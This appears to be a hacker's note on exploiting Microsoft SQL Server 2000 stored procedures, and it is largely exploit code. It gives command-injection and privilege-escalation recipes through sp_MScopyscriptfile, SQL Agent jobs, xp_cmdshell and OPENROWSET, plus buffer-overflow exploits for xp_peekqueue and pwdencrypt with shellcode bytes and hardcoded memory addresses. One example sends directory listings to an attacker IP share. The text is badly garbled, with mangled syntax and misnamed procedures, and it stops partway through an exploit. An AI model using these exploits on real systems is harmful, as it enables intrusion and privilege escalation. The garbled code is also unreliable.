Microsoft SQL public Exploitation

Hacker note

Note: Very old technology, mostly for sql2000 testing, not very effective for sql2005
1.
Xp_runwebtask msdb. dbo. mswebtasks
Allows the PUBLIC permission to perform INSERT, UPDATE, DELETE, and SELECT operations.

Attackers who pass SQL SERVER Authentication can delete, insert, or update WEB tasks created by other users. In addition, attackers can run existing WEB tasks and perform various operations.
May use the SQL Server Agent service account permission to execute arbitrary OS commands or escalate permissions to SYSADMIN group users
2.

The user-submitted parameters in multiple DBCC functions do not have the correct buffer boundary check. Submitting a super-long string as a parameter to the following stored procedure may cause a buffer overflow.
Processes that use the SQL Server Agent Proxy account execute arbitrary commands in the system:
Dbcc addextendedproc (xp_storedproc, XXX...) ()
Dbcc indexfrag (, XXX...) (B)
Dbcc updateusage (, XXX...) (c)
Dbcc checkconstraints (XXX...) (c)
Dbcc showcontig (XXX...) (d)
Dbcc cleantable (, XXX...) (d)
(A) Only sysadmin fixed server role members can run this command.
(B) Only sysadmin fixed server role, db_owner, or db_ddladmin fixed database role can run this command.
(C) Only sysadmin fixed server role or db_owner fixed database role can run this command.
(D) All users can run this command.
3.
The storage process Sp_MScopyscriptfile in Microsoft SQL Server does not properly filter user-submitted parameters. Remote attackers can exploit this vulnerability
Server Agent Proxy account permission to execute arbitrary commands on the system.
Sp_MScopyscriptfile: You can create a directory in the copy directory of the SQL Server and copy the script to the directory. The Stored Procedure contains the @ scriptfile input parameter
To copy the name of the script file, the Sp_MScopyscriptfile stored procedure does not properly filter the externally provided parameters. Remote attackers can insert the Operating System
Execute the command through xp_cmdshell. If the SQL Server Agent Proxy account is stored in the system, attackers can use the permissions of the SQL Server Agent Proxy account
But the default SQL Server Agent Proxy account requires the SQL administrator privilege to activate it.

Declare @ command varchar (100)
Declare @ scripfile varchar (200)
Set concat_null_yields_null off
Select @ command = dir c:>
"\ Attackerip1_dir.txt"
Select @ scripfile = c: autoexec. bat> nul "| +
@ Command + | rd"
Exec sp_MScopyscriptfile @ scripfile,
4.
Microsoft SQL Server sp_replwritetovarbin () Heap Overflow Exploit
Html> http://hi.baidu.com/hack_forensic/blog/item/be1ea0142951b75bf3de32d9.html
5.
Sp_add_job, sp_add_job_step
USE msdb
EXEC sp_add_job @ job_name = GetSystemOnSQL,
@ Enabled = 1,
@ Description = This will give a low privileged user access
Xp_mongoshell,
@ Delete_level = 1
EXEC sp_add_jobstep @ job_name = GetSystemOnSQL,
@ Step_name = Exec my SQL,
@ Subsystem = TSQL,
@ Command = exec master .. xp_execresultset Nselect exec
Master .. xp_mongoshell "dir> c: agent-job-results.txt", NMaster
EXEC sp_add_jobserver @ job_name = GetSystemOnSQL,
@ Server_name = SERVER_NAME
EXEC sp_start_job @ job_name = GetSystemOnSQL
6.
USE msdb
EXEC sp_add_job @ job_name = ArbitraryFileCreate,
@ Enabled = 1,
@ Description = This will create a file called c: sqlafc123.txt,
@ Delete_level = 1
EXEC sp_add_jobstep @ job_name = ArbitraryFileCreate,
@ Step_name = SQLAFC,
@ Subsystem = TSQL,
@ Command = select hello, this file was created by the SQL Agent .,
@ Output_file_name = c: sqlafc123.txt
EXEC sp_add_jobserver @ job_name = ArbitraryFileCreate,
@ Server_name = SERVER_NAME
EXEC sp_start_job @ job_name = ArbitraryFileCreate
7.
Xp_execresultset xp_printstatements xp_displayparamstmt
Exec xp_displayparamstmt Nexec master .. xp_shareshell dir> c: esp-results.txt, Nmaster, 1
8.
Xp_peekqueue
Declare @ query varchar (4000) declare @ end_query varchar (500) declare @ short_jump varchar (8)

Declare @ sra varchar (8) declare @ call_eax varchar (4) declare @ WinExec varchar (8) declare @ mov varchar (4)
Declare @ ExitThread varchar (8)
Declare @ exploit_code varchar (200)
Declare @ command varchar (300)
Declare @ msver nvarchar (200)
Declare @ ver int
Declare @ sp nvarchar (20)
Select @ command =
Bytes
00

Select @ sp = NService Pack
Select @ msver = @ version
Select @ ver = ascii (substring (reverse (@ msver), 3, 1 ))
If @ ver = 53
Print @ sp + char (@ ver) -- Windows 2000 SP5 For when it comes out. else if @ ver = 52
Print @ sp + char (@ ver) -- Windows 2000 SP4 For when it comes out. else if @ ver = 51
Print @ sp + char (@ ver) -- Windows 2000 SP3 For when it comes out.
Else if @ ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END

Print @ sp + char (@ ver)
Select @ sra = 0x43E5E677
Select @ WinExec = 0xAFA7E977
Select @ ExitThread = 0xE275E877
Else if @ ver = 49 -- Windows 2000 Service Pack 1
BEGIN
END

Select @ sra = 0x00000000 -- need to get address select @ WinExec = 0x00000000 -- need to get address select @ ExitThread =
0x00000000 -- need to get address
Else -- No Windows 2000 Service Pack
BEGIN
END

Select @ sra = 0x00000000 -- need to get address
Select @ WinExec = 0x00000000 -- need to get address select @ ExitThread = 0x00000000 -- need to get address
Select @ query = exec xp_peekqueue
1111111111111111111111111111111111111111111111111111111111111111111111111111

11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111 AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLL
Llmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwxxxxyyyyzzzz
Select @ end_query =, a,
Select @ short_jump = 0xEB0A9090
Select @ mov = 0xB8
Select @ exploit_code = 0x90909090909090909090558BEC33C0508D432A50B8
Select @ call_eax = 0xFFD0
Select @ query = @ query + @ short_jump + @ sra + @ exploit_code + @ WinExec + @ call_eax +
@ Mov + @ ExitThread + @ call_eax + @ command + @ end_query exec (@ query)
9. OPENROWSET
SELECT * from openrowset (SQLOLEDB, Trusted_Connection = Yes; Data Source = myserver,
Set fmtonly off execute master .. xp_cmdshell "dir c :")

10. pwdencrypt
Declare @ msver nvarchar (200)
Declare @ ver int
Declare @ sp nvarchar (20)

Declare @ call_eax nvarchar (8) declare @ exploit nvarchar (2000) declare @ padding nvarchar (200)
Declare @ exploit_code nvarchar (1000)
Declare @ sra nvarchar (8)
Declare @ short_jump nvarchar (8)
Declare @ a_bit_more_pad nvarchar (16)
Declare @ WinExec nvarchar (16)
Declare @ command nvarchar (300)
Select @ command =
Bytes
00
Select @ sp = NService Pack
Select @ msver = @ version
Select @ ver = ascii (substring (reverse (@ msver), 3, 1 ))

If @ ver = 53
Print @ sp + char (@ ver) -- Windows 2000 SP5 For when it comes out. else if @ ver = 52
Print @ sp + char (@ ver) -- Windows 2000 SP4 For when it comes out. else if @ ver = 51
Print @ sp + char (@ ver) -- Windows 2000 SP3 For when it comes out.
Else if @ ver = 50 -- Windows 2000 Service Pack 2
BEGIN
END

Print @ sp + char (@ ver)
Select @ sra = 0x2B49E277
Select @ WinExec = 0xAFA7E977
Else if @ ver = 49 --